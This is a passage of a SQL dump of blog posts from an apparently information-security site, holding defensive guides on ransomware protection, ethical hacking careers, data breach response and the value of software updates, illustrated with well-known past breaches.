(90, 'What is Ransomware and How to Protect Against It: A Comprehensive Guide', 'what-is-ransomware-and-how-to-protect-against-it-a-comprehensive-guide', '# Understanding Ransomware\n\nRansomware is a sophisticated form of malware designed to hold your data hostage, effectively locking you out of your files and systems. It encrypts your data using complex algorithms, making it inaccessible without a unique decryption key that only the attackers possess. To regain access, victims are typically required to pay a ransom, often demanded in cryptocurrency to maintain the attacker\'s anonymity.\n\n## Types of Ransomware\n\nThere are several types of ransomware, each with its own characteristics:\n\n1. **Crypto Ransomware**: Encrypts files on a system, rendering the content useless without the decryption key.\n2. **Locker Ransomware**: Locks users out of their entire system instead of encrypting files.\n3. **Scareware**: Uses fake alerts to trick users into paying for unnecessary \"fixes.\"\n4. **Doxware**: Also known as leakware, this ransomware threatens to publish stolen sensitive data unless a ransom is paid.\n5. **Ransomware-as-a-Service (RaaS)**: A subscription-based model where ransomware tools are sold or rented to affiliates, making it accessible even to cybercriminals without advanced technical skills.\n6. **Wiper Malware**: While not technically ransomware, this malicious software disguises itself as ransomware but actually destroys data permanently.\n\n## How Ransomware Works\n\nUnderstanding the lifecycle of a ransomware attack can help in developing effective prevention strategies. Here\'s a typical ransomware attack process:\n\n1. **Initial Infection**: Ransomware often enters systems through phishing emails, malicious attachments, compromised websites, or exploit kits.\n2. **Stealth and Propagation**: Once inside, the ransomware may lie dormant, spreading to other connected systems and devices.\n3. 
**Data Encryption**: The malware then begins encrypting files, making them inaccessible to the user.\n4. **Ransom Demand**: After encryption, a ransom note is displayed, demanding payment for the decryption key.\n5. **Potential Data Exfiltration**: In some cases, attackers may also steal sensitive data before encryption, threatening to leak it if the ransom isn\'t paid (double extortion technique).\n\n## Protecting Against Ransomware\n\nNow that we understand what ransomware is and how it operates, let\'s explore comprehensive strategies to protect against it:\n\n### 1. Implement Robust Backup Solutions\n\nOne of the most effective defenses against ransomware is a solid backup strategy:\n\n- Follow the 3-2-1 rule: Keep at least three copies of your data, on two different types of media, with one copy stored off-site.\n- Regularly test your backups by actually restoring them, and time the restore: a backup that would take weeks to restore is a business-continuity problem in itself.\n- Keep some backups offline, air-gapped, or in immutable storage, and protect the backup system with separate credentials and MFA: attackers routinely look for and delete or encrypt any backups they can reach before triggering encryption.\n\n### 2. Keep Systems and Software Updated\n\nCybercriminals often exploit vulnerabilities in outdated software:\n\n- Regularly update your operating systems, applications, and firmware.\n- Enable automatic updates whenever possible.\n- Pay special attention to security patches and apply them promptly, prioritizing internet-facing systems and vulnerabilities known to be exploited in the wild.\n\n### 3. Employ Strong Security Software\n\nUse comprehensive security solutions to protect your systems:\n\n- Install reputable antivirus and anti-malware software on all devices.\n- Consider using specialized ransomware protection tools.\n- Ensure your security software is always up-to-date.\n\n### 4. Educate and Train Users\n\nHuman error is often the weakest link in cybersecurity:\n\n- Provide regular cybersecurity awareness training to all employees.\n- Teach users to recognize phishing attempts and suspicious emails.\n- Encourage a culture of security consciousness in your organization.\n\n### 5. 
Implement Network Segmentation\n\nLimit the potential spread of ransomware within your network:\n\n- Separate critical systems and data from the general network.\n- Use virtual local area networks (VLANs) to isolate different parts of your network.\n- Implement strong access controls between network segments.\n\n### 6. Use Email and Web Filtering\n\nMany ransomware attacks start with malicious emails or web content:\n\n- Implement robust email filtering to block suspicious attachments and links.\n- Use web filtering to prevent access to known malicious websites.\n- Consider sandboxing suspicious files before they enter your network.\n\n### 7. Implement Least Privilege Access\n\nRestrict user permissions to minimize the potential impact of a ransomware infection:\n\n- Give users only the access they need to perform their jobs.\n- Regularly review and update access permissions.\n- Use multi-factor authentication (MFA) for all user accounts, especially for privileged access.\n\n### 8. Develop and Test an Incident Response Plan\n\nBe prepared for the worst-case scenario:\n\n- Create a detailed incident response plan that outlines steps to take in case of a ransomware attack.\n- Assign roles and responsibilities to team members.\n- Regularly test and update your plan through tabletop exercises and simulations.\n\n### 9. Monitor Network Activity\n\nDetect potential ransomware activity early:\n\n- Implement network monitoring tools to detect unusual activity.\n- Use Security Information and Event Management (SIEM) solutions for real-time analysis of security alerts.\n- Consider using artificial intelligence and machine learning tools for advanced threat detection.\n\n### 10. 
Be Cautious with Remote Desktop Protocol (RDP)\n\nRDP is a common entry point for ransomware:\n\n- Disable RDP if it\'s not necessary.\n- If RDP is required, use a Virtual Private Network (VPN) and multi-factor authentication.\n- Never expose RDP (TCP 3389) directly to the internet; limit access to specific IP addresses, keep it behind a firewall or gateway, and monitor for brute-force login attempts.\n\n## What to Do If You\'re Hit by Ransomware\n\nDespite best efforts, ransomware attacks can still occur. If you find yourself a victim:\n\n1. Isolate the infected systems immediately to prevent further spread: disconnect them from the network rather than powering them off, so that volatile evidence (memory, running processes) is preserved for investigators, and preserve logs before anything is wiped or rebuilt.\n2. Report the incident to law enforcement.\n3. Do not pay the ransom, as this doesn\'t guarantee data recovery and encourages further attacks; payment may also be legally restricted if the group is sanctioned. Check whether a free decryptor exists for the strain, since law-enforcement and vendor projects publish them for some families.\n4. Restore your systems from clean backups only after ensuring the ransomware has been completely removed and the initial entry point has been closed; restoring onto a still-compromised network just gets the data encrypted again.\n5. Conduct a post-incident review to identify how the attack occurred and improve your defenses.\n\nRansomware is a serious threat in today\'s digital world, but with the right precautions and strategies, you can significantly reduce your risk of falling victim to these attacks. By implementing robust backup solutions, keeping systems updated, educating users, and following the other best practices outlined in this guide, you can create a strong defense against ransomware and other cyber threats. Remember, cybersecurity is an ongoing process. Stay informed about the latest threats and continuously adapt your defenses to stay one step ahead of cybercriminals. With vigilance and the right strategies, you can protect your valuable data and systems from the growing threat of ransomware.', '', 'http://infoseclabs.io/uploads/1773428403445-775146537.jpg', 'A digital lock symbolizing ransomware security measures', 1, 'published', '2026-01-03 07:51:00', '2026-03-13 22:00:32', 'Information Security', 'Ransomware Protection: Comprehensive Guide', 'Learn what ransomware is, its types, and how to protect your data with effective strategies.', 'Ransomware Protection'),
(91, 'The Ultimate Guide to Ethical Hacking: A Beginner\'s Journey', 'the-ultimate-guide-to-ethical-hacking-a-beginners-journey', '<p class=\"mb-2 last:mb-0\"><strong>The Ultimate Guide to Ethical Hacking: A Beginner\'s Journey</strong></p>\r\n<p class=\"mb-2 last:mb-0\">In today\'s digital age, cybersecurity has become an essential aspect of any organization\'s infrastructure. With the rise of cyber threats, it\'s no wonder that companies are investing heavily in security measures to protect their data and systems. But what exactly is ethical hacking? In this comprehensive guide, we\'ll delve into the world of white-hat hacking, exploring its definition, benefits, and applications.</p>\r\n<p class=\"mb-2 last:mb-0\"><strong>What is Ethical Hacking?</strong></p>\r\n<p class=\"mb-2 last:mb-0\">Ethical hacking, also known as white-hat hacking, refers to the practice of identifying vulnerabilities in computer systems, networks, or applications by simulating real-world attacks. Unlike malicious hackers (black-hats), who use their skills for nefarious purposes, ethical hackers work with organizations to strengthen their defenses and improve overall security posture.</p>\r\n<p class=\"mb-2 last:mb-0\"><strong>History of Ethical Hacking</strong></p>\r\n<p class=\"mb-2 last:mb-0\">The concept of white-hat hacking dates back to the early days of computing, when security experts began using their skills to identify vulnerabilities in systems. In the 1990s, the term \"hacker\" took on a negative connotation, implying malicious intent. 
However, as organizations began to recognize the value of proactive security measures, the term \"ethical hacking\" emerged, emphasizing the importance of working with companies to improve their defenses.</p>\r\n<p class=\"mb-2 last:mb-0\"><strong>Types of Ethical Hacking</strong></p>\r\n\r\n<ol>\r\n 	<li><strong>Vulnerability Assessment:</strong> This involves identifying potential vulnerabilities in systems, networks, or applications using tools and techniques.</li>\r\n 	<li><strong>Penetration Testing:</strong> A more comprehensive approach than vulnerability assessment, penetration testing simulates real-world attacks to test the strength of an organization\'s defenses.</li>\r\n 	<li><strong>Web Application Security Testing (WAST):</strong> Focuses on identifying vulnerabilities in web applications, such as SQL injection or cross-site scripting (XSS).</li>\r\n 	<li><strong>Network Security Testing:</strong> Evaluates the security of network infrastructure, including firewalls, routers, and switches.</li>\r\n</ol>\r\n<p class=\"mb-2 last:mb-0\"><strong>Benefits of Ethical Hacking</strong></p>\r\n\r\n<ol>\r\n 	<li><strong>Improved Security Posture:</strong> Regular vulnerability assessments and penetration testing help identify and address weaknesses before they can be exploited.</li>\r\n 	<li><strong>Reduced Risk:</strong> By proactively addressing potential vulnerabilities, organizations can minimize the risk of a successful attack.</li>\r\n 	<li><strong>Compliance and Regulatory Confidence:</strong> Ethical hacking services help organizations meet regulatory requirements, reducing the likelihood of non-compliance fines or penalties.</li>\r\n 	<li><strong>Enhanced Incident Response Planning:</strong> Well-prepared incident response plans enable companies to respond quickly and effectively in the event of an attack.</li>\r\n</ol>\r\n<p class=\"mb-2 last:mb-0\"><strong>How Ethical Hacking Works</strong></p>\r\n\r\n<ol>\r\n 	<li><strong>Pre-Assessment:</strong> 
The ethical hacking team conducts a thorough review of the organization\'s systems, networks, and applications to identify potential vulnerabilities.</li>\r\n 	<li><strong>Vulnerability Identification:</strong> Using specialized tools and techniques, the team identifies vulnerabilities and prioritizes them based on risk level.</li>\r\n 	<li><strong>Penetration Testing:</strong> The team simulates real-world attacks to test the strength of an organization\'s defenses, identifying any vulnerabilities that were not previously detected.</li>\r\n 	<li><strong>Reporting and Recommendations:</strong> The team provides a comprehensive report outlining identified vulnerabilities, recommended remediation steps, and suggestions for improving overall security posture.</li>\r\n</ol>\r\n<p class=\"mb-2 last:mb-0\"><strong>Tools Used in Ethical Hacking</strong></p>\r\n\r\n<ol>\r\n 	<li><strong>Nmap:</strong> A network scanning tool used to identify open ports and services on target systems.</li>\r\n 	<li><strong>Burp Suite:</strong> A web application testing tool used to identify vulnerabilities such as SQL injection or XSS.</li>\r\n 	<li><strong>Metasploit:</strong> A penetration testing framework used to simulate real-world attacks and identify vulnerabilities.</li>\r\n</ol>\r\n<p class=\"mb-2 last:mb-0\"><strong>Career Opportunities in Ethical Hacking</strong></p>\r\n\r\n<ol>\r\n 	<li><strong>Ethical Hacker:</strong> Responsible for identifying vulnerabilities and developing remediation strategies.</li>\r\n 	<li><strong>Security Consultant:</strong> Works with organizations to develop comprehensive security plans and implement recommendations.</li>\r\n 	<li><strong>Incident Response Specialist:</strong> Responds to security incidents, analyzing and mitigating potential threats.</li>\r\n</ol>\r\n<p class=\"mb-2 last:mb-0\"><strong>How to Get Started in Ethical Hacking</strong></p>\r\n\r\n<ol>\r\n 	<li><strong>Education:</strong> Pursue a degree in computer science or a related 
field, focusing on cybersecurity and networking.</li>\r\n 	<li><strong>Training:</strong> Enroll in online courses or certification programs, such as the Certified Ethical Hacker (CEH) program.</li>\r\n 	<li><strong>Hands-on Experience:</strong> Practice in deliberately vulnerable labs, capture-the-flag (CTF) events, and bug bounty programs, and only ever test systems you own or have explicit written permission and a defined scope to test. Volunteering to test a non-profit\'s systems still requires that written authorization; testing without permission is a crime in most jurisdictions, regardless of intent.</li>\r\n</ol>\r\n<p class=\"mb-2 last:mb-0\">Ethical hacking is a vital component of any robust security strategy. By leveraging the expertise of white-hat hackers, organizations can identify vulnerabilities, strengthen their defenses, and reduce the risk of a successful attack. Whether you\'re a beginner looking to break into the field or an experienced professional seeking to enhance your skills, this guide has provided a comprehensive introduction to the world of ethical hacking.</p>\r\n<p class=\"mb-2 last:mb-0\"><strong>Frequently Asked Questions (FAQs)</strong></p>\r\n\r\n<ol>\r\n 	<li><strong>Q: What is the difference between black-hat and white-hat hacking?</strong> A: The difference is authorization and intent: black-hat hacking is unauthorized activity for personal gain or harm, while white-hat hacking is performed with the organization\'s explicit permission, within an agreed scope, to improve its defenses.</li>\r\n 	<li><strong>Q: Can I learn ethical hacking on my own?</strong> A: Yes, but it\'s recommended to pursue formal education or training in cybersecurity and networking, and to practice only on lab environments and platforms that invite testing.</li>\r\n 	<li><strong>Q: What are the benefits of regular vulnerability assessments and penetration testing?</strong> A: These activities help identify and address weaknesses before they can be exploited, reducing risk and improving overall security posture.</li>\r\n</ol>', '', NULL, NULL, 1, 'draft', '2024-12-08 21:22:32', '2026-01-12 21:41:44', 'Information Security', 'The Ultimate Guide to Ethical Hacking: A Beginner\'s Journey', '', NULL),
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(92, 'How to Detect and Respond to a Data Breach: A Comprehensive Guide', 'how-to-detect-and-respond-to-a-data-breach-a-comprehensive-guide', '<span style=\"font-weight: 400\">Data breaches have become a significant threat to organizations and individuals alike. The consequences of these breaches can range from financial losses to reputational damage, making it essential to detect and respond to them effectively. Whether you\'re a small business owner, IT professional, or simply someone concerned about cybersecurity, understanding how to identify and address a data breach is vital. This guide will walk you through the key steps for detecting and responding to a data breach, with real-world examples and actionable tips.</span>\r\n<h2><span style=\"font-weight: 400\">What is a Data Breach?</span></h2>\r\n<span style=\"font-weight: 400\">A data breach occurs when sensitive, confidential, or protected information is accessed or disclosed without authorization. This can happen due to various reasons, including hacking, insider threats, or even human error. Common types of data breaches include the theft of personally identifiable information (PII), financial data, intellectual property, and login credentials.</span>\r\n<h2><span style=\"font-weight: 400\">How to Detect a Data Breach</span></h2>\r\n<span style=\"font-weight: 400\">Detecting a data breach early can significantly reduce its impact. Here are the key methods and tools for identifying potential breaches:</span>\r\n<h2><span style=\"font-weight: 400\">1. Monitor Network Activity</span></h2>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Continuous real-time monitoring of network traffic is essential for spotting unusual activity. 
Signs of a breach may include:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Unusual spikes in outbound data transfers, especially to unfamiliar destinations or outside business hours</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Unauthorized access attempts</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Abnormal login patterns, such as logins at unusual hours, from new locations, or impossible travel between two locations</span></li>\r\n</ul>\r\n</li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Tools like Intrusion Detection Systems (IDS) and Security Information and Event Management (SIEM) software can help monitor network traffic for malicious activity, provided the logs they need are actually being collected and retained.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">2. Watch for Early Warning Signs</span></h2>\r\n<span style=\"font-weight: 400\">Some common indicators of a potential breach include:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Unusual System Behavior: Unexpected slowdowns or crashes may point to unauthorized activity.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Unauthorized Access: Detection of unfamiliar user accounts or login attempts from unknown locations.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Unexplained Data Modifications: Changes in files or system settings without proper authorization.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Increased Phishing Attempts: A sudden spike in phishing emails targeting employees could indicate an ongoing attack.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">3. Use Threat Intelligence</span></h2>\r\n<span style=\"font-weight: 400\">Advanced tools can scan the dark web and other sources for leaked credentials or sensitive company information. 
For example:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Breach detection tools like Breachsense monitor forums, marketplaces, and ransomware gang communications for mentions of your data.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">4. Conduct Regular Security Audits</span></h2>\r\n<span style=\"font-weight: 400\">Routine audits help identify vulnerabilities before they are exploited. These audits should include:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Reviewing access logs</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Scanning for unpatched software</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Testing security controls through penetration testing.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">5. Endpoint Monitoring</span></h2>\r\n<span style=\"font-weight: 400\">Endpoint Detection and Response (EDR) tools can monitor devices like laptops and servers for suspicious activities such as malware installation or unauthorized file transfers.</span>\r\n<h2><span style=\"font-weight: 400\">Real-Life Examples of Data Breaches</span></h2>\r\n<span style=\"font-weight: 400\">Understanding past breaches helps highlight the importance of early detection:</span>\r\n<h2><span style=\"font-weight: 400\">1. Equifax Data Breach (2017)</span></h2>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">What Happened: Hackers exploited an unpatched vulnerability in Apache Struts software.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Impact: Personal information of 147 million people was exposed.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Lesson Learned: Regularly updating software and patching vulnerabilities is critical.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">2. 
Target Data Breach (2013)</span></h2>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">What Happened: Attackers gained access through a third-party vendor\'s credentials.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Impact: Stolen credit card details of 40 million customers.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Lesson Learned: Vendor access should be limited to what the vendor actually needs, segmented away from sensitive systems such as payment networks, and monitored; strong access controls on third parties are essential.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">3. SolarWinds Supply Chain Attack (2020)</span></h2>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">What Happened: Hackers inserted malware into SolarWinds\' Orion software updates.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Impact: Compromised systems in government agencies and major corporations.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Lesson Learned: No single audit reliably prevents a compromised vendor update; reduce the blast radius instead. Inventory your software suppliers, restrict what management tools like Orion can reach on the network, monitor their outbound connections, and treat unexpected behaviour from trusted software as a signal rather than noise.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">How to Respond to a Data Breach</span></h2>\r\n<span style=\"font-weight: 400\">Once a breach is detected, swift action is necessary to minimize damage. Follow these steps:</span>\r\n<h2><span style=\"font-weight: 400\">1. 
Contain the Breach</span></h2>\r\n<span style=\"font-weight: 400\">Immediately isolate affected systems to prevent further unauthorized access or data exfiltration:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Disconnect compromised devices from the network.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Disable user accounts involved in suspicious activity.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Block malicious IP addresses using firewalls.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">2. Assemble an Incident Response Team</span></h2>\r\n<span style=\"font-weight: 400\">Form a team that includes:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">IT security professionals</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Legal counsel</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Forensic experts</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Communication specialists</span><span style=\"font-weight: 400\">\r\n</span><span style=\"font-weight: 400\">This team will coordinate efforts to investigate the breach, mitigate risks, and communicate with stakeholders.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">3. 
Investigate the Breach</span></h2>\r\n<span style=\"font-weight: 400\">Conduct a thorough investigation to determine:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">The source and scope of the breach</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">The type of data compromised</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">The methods used by attackers</span><span style=\"font-weight: 400\">\r\n</span><span style=\"font-weight: 400\">Forensic experts can analyze logs, backup data, and system images to gather evidence. Preserve those sources before systems are wiped or rebuilt (take disk and memory images and export logs), and keep a chain-of-custody record in case the evidence is needed in legal proceedings.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">4. Notify Affected Parties</span></h2>\r\n<span style=\"font-weight: 400\">Transparency is crucial during a data breach:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Notify affected individuals promptly if their personal information was compromised.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Provide clear instructions on how they can protect themselves (e.g., monitoring credit reports).</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Comply with legal requirements such as GDPR or HIPAA regarding breach notifications. These set deadlines: for example, GDPR requires notifying the supervisory authority within 72 hours of becoming aware of a breach of personal data, so involve legal counsel as soon as the breach is confirmed.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">5. 
Remediate Vulnerabilities</span></h2>\r\n<span style=\"font-weight: 400\">Address the root cause of the breach by:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Patching vulnerabilities in software or systems.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Strengthening access controls (e.g., implementing multi-factor authentication).</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Updating security policies based on lessons learned from the incident.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">6. Communicate Effectively</span></h2>\r\n<span style=\"font-weight: 400\">Develop a communication plan that includes:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Internal updates for employees and management</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Public statements for customers and media</span><span style=\"font-weight: 400\">\r\n</span><span style=\"font-weight: 400\">Avoid withholding information that could help stakeholders protect themselves but also ensure accuracy in your messaging.</span></li>\r\n</ul>\r\n<h2><span style=\"font-weight: 400\">Preventing Future Data Breaches</span></h2>\r\n<span style=\"font-weight: 400\">Prevention is always better than cure. 
Here are some best practices:</span>\r\n<ol>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement Strong Access Controls: Use multi-factor authentication (MFA) and role-based permissions to limit access to sensitive data.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly Update Software: Ensure all systems are patched promptly to close security gaps.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Educate Employees: Train staff on recognizing phishing attempts and other common threats.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Encrypt Sensitive Data: Use encryption both at rest and in transit to protect valuable information even if stolen.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Conduct Security Audits: Regularly test your systems for vulnerabilities through penetration testing and risk assessments.</span></li>\r\n</ol>\r\n<span style=\"font-weight: 400\">Detecting and responding to a data breach requires vigilance, preparation, and swift action. By monitoring your systems proactively, recognizing early warning signs, and having a well-prepared response plan in place, you can minimize the impact of breaches when they occur.</span>\r\n\r\n<span style=\"font-weight: 400\">Learning from real-world incidents like Equifax or SolarWinds highlights the importance of staying ahead in cybersecurity efforts through regular updates, employee training, and robust incident response strategies.</span>\r\n\r\n<span style=\"font-weight: 400\">In today’s interconnected world, it’s not just about whether you’ll face a breach but how prepared you are when it happens. 
Take these steps seriously—your organization’s reputation and financial stability may depend on it!</span>', '', NULL, NULL, 1, 'draft', '2024-12-07 16:39:18', '2026-01-12 21:41:44', 'Information Security', 'How to Detect and Respond to a Data Breach: A Comprehensive Guide', '', NULL),
(93, 'The Importance of Regular Software Updates: Lessons from Real-World Cyber Attacks', 'the-importance-of-regular-software-updates', '<span style=\"font-weight: 400\">The importance of regular software updates cannot be overstated. As cyber threats continue to evolve and become more sophisticated, keeping software up-to-date has become a critical aspect of cybersecurity. This article explores the significance of software updates and presents real-life examples of attacks that exploited outdated software, demonstrating the severe consequences of neglecting this crucial practice.</span>\r\n<h3><strong>Understanding the Importance of Software Updates</strong></h3>\r\n<span style=\"font-weight: 400\">Regular software updates serve multiple purposes:</span>\r\n<ol>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Patching Security Vulnerabilities: Updates often include security patches that address known vulnerabilities, effectively closing potential entry points for </span><span style=\"margin: 0px;padding: 0px\">cybercriminals</span><span style=\"font-weight: 400\">.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Enhancing Performance: Many updates contain performance optimizations that improve system efficiency and stability</span><span style=\"font-weight: 400\">.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Ensuring Compatibility: Updates help maintain compatibility with new hardware, operating systems, and other applications</span><span style=\"font-weight: 400\">.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Adding New Features: Software updates frequently introduce new functionalities, improving user experience without the need for new software purchases</span><span style=\"font-weight: 400\">.</span></li>\r\n</ol>\r\n<h3><strong>The Risks of Outdated Software</strong></h3>\r\n<span style=\"font-weight: 400\">Failing to update software 
regularly exposes individuals and organizations to significant risks:</span>\r\n<ol>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Increased Vulnerability to Cyberattacks: Outdated software is an easy target for hackers who exploit known </span><span style=\"margin: 0px;padding: 0px\">vulnerabilities</span><span style=\"font-weight: 400\">.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Data Breaches: Unpatched vulnerabilities can lead to unauthorized access and theft of sensitive </span><span style=\"margin: 0px;padding: 0px\">information</span><span style=\"font-weight: 400\">.</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">System Instability: Outdated software may cause compatibility issues, reduced performance, and system crashes</span><span style=\"font-weight: 400\">.</span></li>\r\n</ol>\r\n<span style=\"font-weight: 400\">Compliance Issues: In some industries, running outdated software may violate regulatory </span><span style=\"margin: 0px;padding: 0px\">requirements</span><span style=\"font-weight: 400\"><span style=\"font-weight: 400\">.\r\n\r\n</span></span>\r\n<h3 id=\"types-of-security-vulnerabilities\">Threats That Exploit Security Vulnerabilities</h3>\r\nSoftware updates often patch security flaws that hackers exploit. Strictly speaking, the items below are not vulnerabilities themselves but the threats that take advantage of unpatched ones: a vulnerability is the weakness in the software, and malware is what an attacker delivers through it. Two of the most common are:\r\n<ul>\r\n 	<li style=\"list-style-type: none\">\r\n<ul>\r\n 	<li><strong>Malware</strong>: Harmful software designed to damage, spy on, or take control of your system.</li>\r\n 	<li><strong>Ransomware</strong>: A type of malware that locks you out of your files until you pay a ransom.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<h2><strong>Real-Life Examples of Attacks Exploiting Outdated Software</strong></h2>\r\n<h3><strong>1. 
The Equifax Data Breach (2017)</strong></h3>\r\n<span style=\"font-weight: 400\">One of the most infamous examples of the consequences of neglecting software updates is the Equifax data breach of 2017</span><span style=\"font-weight: 400\">.</span>\r\n\r\n<span style=\"font-weight: 400\">What Happened: Equifax, one of the largest credit reporting agencies in the United States, suffered a massive data breach that exposed the personal information of approximately 147 million people.</span>\r\n\r\n<span style=\"font-weight: 400\">The Cause: The breach was attributed to a known vulnerability in the Apache Struts web application framework. Despite a patch being available for months, Equifax had failed to update their systems.</span>\r\n\r\n<span style=\"font-weight: 400\">The Impact: The breach resulted in the exposure of sensitive personal data, including:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Names</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Social Security numbers</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Birth dates</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Addresses</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Driver\'s license numbers</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">This incident led to significant financial losses for Equifax, damaged its reputation, and resulted in numerous legal actions against the company.</span>\r\n<h3><strong>2. 
WannaCry Ransomware Attack (2017)</strong></h3>\r\n<span style=\"font-weight: 400\">The WannaCry ransomware attack of 2017 is another stark example of the dangers posed by outdated software</span><span style=\"font-weight: 400\">.</span>\r\n\r\n<span style=\"font-weight: 400\">What Happened: This global cyberattack affected over 200,000 computers across 150 countries.</span>\r\n\r\n<span style=\"font-weight: 400\">The Cause: WannaCry spread on its own, with no user interaction, by exploiting a vulnerability in the Windows file-sharing service for which Microsoft had already released a fix roughly two months before the outbreak. The systems hit were those that hadn\'t yet been updated or were running versions no longer supported.</span>\r\n\r\n<span style=\"font-weight: 400\">The Impact: The attack had far-reaching consequences:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Encrypted data on infected computers, demanding ransom payments in Bitcoin</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Disrupted critical services, including healthcare systems in the UK\'s National Health Service</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Caused estimated damages of billions of dollars worldwide</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">This incident highlighted the importance of not only keeping software updated but also discontinuing the use of unsupported operating systems—and of segmenting networks, since a self-spreading worm stops only where it can no longer reach another vulnerable machine.</span>\r\n<h3><strong>3. 
